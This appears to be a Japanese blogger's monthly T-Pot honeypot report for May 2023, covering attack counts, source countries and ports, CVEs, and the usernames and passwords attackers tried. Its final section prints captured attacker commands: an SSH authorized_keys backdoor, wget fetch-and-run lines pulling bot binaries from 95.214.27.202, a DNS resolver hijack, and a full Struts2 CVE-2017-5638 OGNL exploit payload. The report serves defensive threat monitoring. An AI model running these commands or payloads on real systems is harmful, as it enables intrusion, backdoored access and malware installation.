ハニーポット運用(月次報告:2023年5月)
1.国土交通省からの情報漏洩について
- 2023年5月26日にg0d というユーザーがハッカーフォーラム上で国土交通省のハッキングしたとするデータを公開した。
- 2023年にチューリッヒおよびアフラックでの個人情報が漏洩されたことに続き、今年は大規模な情報漏洩が身近に起こっている実感がある。
- Pompompurin氏の逮捕とともにハッカーフォーラムの1つが閉鎖されたが、代替サイトがまた雨後の筍のように現れるのが現実のようだ。
詳細は以下報告書に的確に纏められている。 https://jp.security.ntt/resources/cyber_security_report/adhoc_CSR_20230529.pdf
2.AWSの資格取得
- 多忙の業務の合間を縫って、AWS Certified Solutions Architect - Professional(SAP-C02) を取得した。
- 受験のきっかけは会社からの報奨金を受け取るため(貧乏なので)であるが1度落ちたので、2度目で取得できて良かった。
- 次回はCISSPかAWS Certified Security - Specialty(SCS-C01)のいずれかを予定。(SCS-C01は2023年7月10日にSCS-C02に切り替わるので、様子見かな。)
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2023年5月1日-2023年5月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先月比 |
---|---|---|---|
1 | Honeytrap | 1,145,903 | 1(→) |
2 | Cowrie | 361,460 | 2(→) |
3 | Dionaea | 216,204 | 3(→) |
4 | Ciscoasa | 107,581 | 4(→) |
5 | Mailoney | 41,912 | 5(→) |
6 | Ddospot | 34,526 | 9(↑) |
7 | Heralding | 28,038 | 6(↓) |
8 | Adbhoney | 11,468 | 7(↑) |
9 | Tanner | 4,241 | 8(↓) |
10 | ConPot | 2,996 | 11(↑) |
11 | Redishoneypot | 2,407 | 10(↓) |
12 | CitrixHoneypot | 1,279 | 12(→) |
13 | ElasticPot | 747 | 13(→) |
14 | Ipphoney | 170 | 14(→) |
15 | Dicompot | 56 | 15(→) |
- Result
- 先月からHoneytrap(1位)~Mailoney(5位)までアクセス数の順位に変更はなかった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | Russia | 554,375 | 1(→) |
2 | United States | 199,299 | 2(→) |
3 | China | 145,170 | 3(→) |
4 | India | 96,774 | 9(↑) |
5 | Hong Kong | 72,217 | 12(↑) |
6 | Netherlands | 45,017 | 16(↑) |
7 | Brazil | 42,391 | 圏外(↑) |
8 | United Kingdom | 38,944 | 5(↓) |
9 | Bulgaria | 36,825 | 8(↓) |
10 | France | 36,301 | 4(↓) |
11 | Germany | 35,355 | 6(↓) |
12 | Monaco | 32,595 | 11(↓) |
13 | Sweden | 28,026 | 13(→) |
14 | Latvia | 26,882 | 14(→) |
15 | Poland | 24,922 | 圏外(↑) |
16 | Vietnam | 24,137 | 15(↓) |
17 | Thailand | 22,084 | 圏外(↑) |
18 | Panama | 20,309 | 17(↓) |
19 | Singapore | 19,655 | 圏外(↑) |
20 | Japan | 15,133 | 18(↓) |
- Result
- 全体のアクセス数は先月より減少傾向にあった。
- アクセス数の比率はロシア(1位)、米国(2位)・中国(3位)で変化はなかった。
上位10ヵ国のアクセスポートの分布は以下の通り
攻撃元の国名 | 宛先ポート | 件数 |
---|---|---|
Russia | 445 | 11,848 |
Russia | 22 | 1,722 |
Russia | 6379 | 978 |
Russia | 34567 | 508 |
Russia | 3389 | 466 |
Russia | 80 | 433 |
Russia | 23 | 394 |
Russia | 8080 | 364 |
Russia | 9001 | 218 |
Russia | 1433 | 198 |
United States | 22 | 7,966 |
United States | 445 | 5,366 |
United States | 23 | 1,831 |
United States | 25 | 1,790 |
United States | 3389 | 1,558 |
United States | 80 | 1,297 |
United States | 6379 | 705 |
United States | 161 | 402 |
United States | 21 | 356 |
United States | 443 | 296 |
China | 22 | 19,711 |
China | 445 | 8,938 |
China | 23 | 6,240 |
China | 25 | 2,201 |
China | 8080 | 1,665 |
China | 2323 | 1,376 |
China | 2375 | 859 |
China | 1433 | 805 |
China | 2376 | 404 |
China | 8888 | 387 |
India | 445 | 82,663 |
India | 22 | 2,021 |
India | 23 | 702 |
India | 1433 | 226 |
India | 50100 | 84 |
India | 1200 | 69 |
India | 80 | 64 |
India | 2323 | 54 |
India | 1234 | 43 |
India | 1962 | 41 |
Hong Kong | 22 | 1,002 |
Hong Kong | 445 | 358 |
Hong Kong | 3389 | 334 |
Hong Kong | 9000 | 124 |
Hong Kong | 58000 | 116 |
Hong Kong | 7547 | 109 |
Hong Kong | 2000 | 105 |
Hong Kong | 3729 | 105 |
Hong Kong | 1025 | 92 |
Hong Kong | 8663 | 92 |
Netherlands | 22 | 1,944 |
Netherlands | 23 | 248 |
Netherlands | 2222 | 204 |
Netherlands | 81 | 140 |
Netherlands | 80 | 129 |
Netherlands | 1459 | 93 |
Netherlands | 1433 | 92 |
Netherlands | 10243 | 78 |
Netherlands | 8800 | 73 |
Netherlands | 8080 | 70 |
Brazil | 53 | 29,665 |
Brazil | 445 | 6,604 |
Brazil | 22 | 969 |
Brazil | 23 | 265 |
Brazil | 2323 | 101 |
Brazil | 1433 | 38 |
Brazil | 19 | 20 |
Brazil | 80 | 15 |
Brazil | 8080 | 14 |
Brazil | 7001 | 9 |
United Kingdom | 25 | 9,530 |
United Kingdom | 22 | 972 |
United Kingdom | 3389 | 162 |
United Kingdom | 445 | 150 |
United Kingdom | 8080 | 117 |
United Kingdom | 23 | 104 |
United Kingdom | 9000 | 93 |
United Kingdom | 80 | 84 |
United Kingdom | 6443 | 84 |
United Kingdom | 4369 | 82 |
Bulgaria | 5900 | 27,456 |
Bulgaria | 23 | 676 |
Bulgaria | 25 | 84 |
Bulgaria | 5555 | 69 |
Bulgaria | 22 | 40 |
Bulgaria | 8088 | 36 |
Bulgaria | 6379 | 30 |
Bulgaria | 445 | 29 |
Bulgaria | 8080 | 15 |
Bulgaria | 80 | 14 |
France | 22 | 1,974 |
France | 445 | 300 |
France | 23 | 161 |
France | 2323 | 150 |
France | 8000 | 47 |
France | 3389 | 44 |
France | 19 | 40 |
France | 8080 | 39 |
France | 3000 | 35 |
France | 8888 | 32 |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | Count |
---|---|---|
1 | CVE-2020-11899,963394 | 963,394 |
2 | CVE-2020-11910,42 | 42 |
3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255,2 | 2 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 19,295 |
2 | admin | 4,052 |
3 | 1,907 | |
4 | user | 1,574 |
5 | ubnt | 1,116 |
6 | 22 | 891 |
7 | pi | 888 |
8 | test | 769 |
9 | sa | 641 |
10 | ubuntu | 630 |
11 | postgres | 617 |
12 | oracle | 601 |
13 | !root | 434 |
14 | 2Wire | 426 |
15 | ansible | 405 |
16 | support | 374 |
17 | ansadmin | 371 |
18 | steam | 366 |
19 | jenkins | 363 |
20 | es | 360 |
21 | telnet | 359 |
22 | craft | 343 |
23 | Admin | 332 |
24 | zjw | 331 |
25 | moxa | 330 |
26 | orangepi | 306 |
27 | 666666 | 279 |
28 | blank | 276 |
29 | guest | 269 |
30 | hadoop | 264 |
31 | mysql | 259 |
32 | devops | 239 |
33 | unknown | 236 |
34 | 0 | 232 |
35 | uucp | 228 |
36 | adm | 226 |
37 | debug | 226 |
38 | cameras | 219 |
39 | factory | 217 |
40 | $ALOC$ | 214 |
41 | zabbix | 207 |
42 | vagrant | 205 |
43 | teste | 203 |
44 | user1 | 184 |
45 | minima | 167 |
46 | usr | 166 |
47 | akash | 152 |
48 | fa | 148 |
49 | default | 129 |
50 | supervisor | 114 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | admin | 2,157 |
2 | 1,976 | |
3 | 123456 | 1,886 |
4 | password | 1,690 |
5 | 1234 | 1,180 |
6 | 12345 | 1,136 |
7 | root | 1,007 |
8 | 1 | 813 |
9 | 123 | 795 |
10 | ubnt | 747 |
11 | 12345678 | 660 |
12 | blank | 642 |
13 | user | 619 |
14 | test | 560 |
15 | 123456789 | 538 |
16 | 1qaz@WSX | 494 |
17 | Admin123 | 487 |
18 | 0 | 472 |
19 | admin123 | 389 |
20 | 666666 | 354 |
21 | Root1234 | 329 |
22 | 1111 | 319 |
23 | support | 317 |
24 | Password1 | 302 |
25 | Aa123456 | 301 |
26 | P@ssw0rd | 297 |
27 | alpine | 279 |
28 | 00000000 | 265 |
29 | admin1234 | 250 |
30 | hi3518 | 248 |
31 | test123 | 239 |
32 | Aa123456. | 226 |
33 | 1234admin | 225 |
34 | _Cisco | 216 |
35 | uucp | 216 |
36 | !ishtar | 213 |
37 | 10023 | 213 |
38 | 1q2w3e4r5t | 212 |
39 | 1234567890 | 210 |
40 | Root2022 | 210 |
41 | backup | 210 |
42 | Password123 | 206 |
43 | qweqwe | 204 |
44 | ubuntu | 204 |
45 | Admin1234 | 203 |
46 | cameras | 203 |
47 | root123 | 202 |
48 | synnet | 200 |
49 | Root1337 | 198 |
50 | Root123 | 197 |
- Result +特記事項なし
⑥今月のmasscanとZmap
massscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- 今月のアクセス
No | アクセス |
---|---|
1 | cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== system key generated by server 20220709">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; |
2 | cat /bin/echo||while read i; do echo $i; done < /proc/self/exe; |
3 | cat /proc/cpuinfo; |
4 | cat /proc/mounts |
5 | cd /dev; wget http[:]//95[.]214[.]27[.]202/arm4 -O- >.f; ./.f ssh.wget.arm4; >.f; echo rppr |
6 | cd /dev; wget http[:]//95[.]214[.]27[.]202/mips -O- >.f; ./.f ssh.wget.mips; >.f; echo rppr |
7 | cd /dev; wget http[:]//95[.]214[.]27[.]202/sparc -O- >.f; ./.f ssh.wget.sparc; >.f; echo rppr |
8 | cd /dev; wget http[:]//95[.]214[.]27[.]202/superh -O- >.f; ./.f ssh.wget.superh; >.f; echo rppr |
9 | cd /dev; wget http[:]//95[.]214[.]27[.]202/x86 -O- >.f; ./.f ssh.wget.x86; >.f; echo rppr |
10 | cd /tmp; wget http[:]//95[.]214[.]27[.]202/arm4 -O- >.f; ./.f ssh.wget.arm4; >.f; echo rppr |
11 | cd /tmp; wget http[:]//95[.]214[.]27[.]202/mipsel -O- >.f; ./.f ssh.wget.mipsel; >.f; echo rppr |
12 | cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ== system key generated by server 20220709">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~; |
13 | echo -e '\x4d\x4f\x55\x4e\x54\x53\x5f\x44\x4f\x4e\x45' |
14 | echo -e '\x72\x70\x70\x72/dev' > /dev/.dabag; cat /dev/.dabag; rm /dev/.dabag |
15 | echo 'nameserver 95.214.27.202'>/etc/resolv.conf; |
16 | mkdir /dev/; mount -o remount, rw /dev/; cp /bin/echo /dev/.z && >/dev/.z && cd /dev/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
17 | mkdir /dev/shm/; mount -o remount, rw /dev/shm/; cp /bin/echo /dev/shm/.z && >/dev/shm/.z && cd /dev/shm/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
18 | mkdir /etc/; mount -o remount, rw /etc/; cp /bin/echo /etc/.z && >/etc/.z && cd /etc/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
19 | mkdir /home/$USER/; mount -o remount, rw /home/$USER/; cp /bin/echo /home/$USER/.z && >/home/$USER/.z && cd /home/$USER/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
20 | mkdir /home/; mount -o remount, rw /home/; cp /bin/echo /home/.z && >/home/.z && cd /home/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
21 | mkdir /mnt/; mount -o remount, rw /mnt/; cp /bin/echo /mnt/.z && >/mnt/.z && cd /mnt/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
22 | mkdir /tmp/; mount -o remount, rw /tmp/; cp /bin/echo /tmp/.z && >/tmp/.z && cd /tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
23 | mkdir /var/; mount -o remount, rw /var/; cp /bin/echo /var/.z && >/var/.z && cd /var/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
24 | mkdir /var/tmp/; mount -o remount, rw /var/tmp/; cp /bin/echo /var/tmp/.z && >/var/tmp/.z && cd /var/tmp/; rm -rf .i; cp .z .i; cp .i .d; chmod 777 .i; chmod 777 .d; |
25 | rm -f /dev/.d; rm -f /dev/.f; >/dev/.d; (chmod 777 /dev/.d || cp /bin/echo /dev/.d; >/dev/.d); cp /dev/.d /dev/.f |
26 | wget || busybox wget || wd1; curl || busybox curl || cd1; echo -e '\x67\x61\x79\x66\x67\x74'; |
27 | wget --help>/dev/null&&echo -en '\x57\x47\x45\x54';curl --help>/dev/null&&echo -en '\x43\x55\x52\x4c'; echo -en '\x67\x61\x79\x66\x67\x74' |
28 | wget http[:]//95[.]214[.]27[.]202/arc -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/arc -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/arc -O-> .i; ./.i ssh.wget.arc; >.i; |
29 | wget http[:]//95[.]214[.]27[.]202/arm4 -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/arm4 -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/arm4 -O-> .i; ./.i ssh.wget.arm4; >.i; |
30 | wget http[:]//95[.]214[.]27[.]202/m68k -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/m68k -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/m68k -O-> .i; ./.i ssh.wget.m68k; >.i; |
31 | wget http[:]//95[.]214[.]27[.]202/mips -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/mips -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/mips -O-> .i; ./.i ssh.wget.mips; >.i; |
32 | wget http[:]//95[.]214[.]27[.]202/mipsel -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/mipsel -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/mipsel -O-> .i; ./.i ssh.wget.mipsel; >.i; |
33 | wget http[:]//95[.]214[.]27[.]202/powerpc -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/powerpc -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/powerpc -O-> .i; ./.i ssh.wget.powerpc; >.i; |
34 | wget http[:]//95[.]214[.]27[.]202/sparc -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/sparc -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/sparc -O-> .i; ./.i ssh.wget.sparc; >.i; |
35 | wget http[:]//95[.]214[.]27[.]202/x86_64 -O-> .i || busybox wget http[:]//95[.]214[.]27[.]202/x86_64 -O-> .i || wd1 http[:]//95[.]214[.]27[.]202/x86_64 -O-> .i; ./.i ssh.wget.x86_64; >.i; |
+ Apache Struts2 の任意のコードが実行可能な脆弱性(CVE-2017-5638) も観測された。
No | 項目名 | 値 |
---|---|---|
1 | country_name: | United States |
2 | url: | / |
3 | http_method: | POST |
4 | dest_ip: | xxx.xxx.xxx.xxx |
5 | dest_port: | 8080 |
6 | src_ip: | 38[.]55[.]129[.]37 |
7 | src_port: | 49350 |
8 | input: | "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 23492384y97923487').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" |
今月の作業BGM
曲名 | アーティスト | 備考 |
---|---|---|
emit | ave;new feat.a.k.a.dRESS | --- |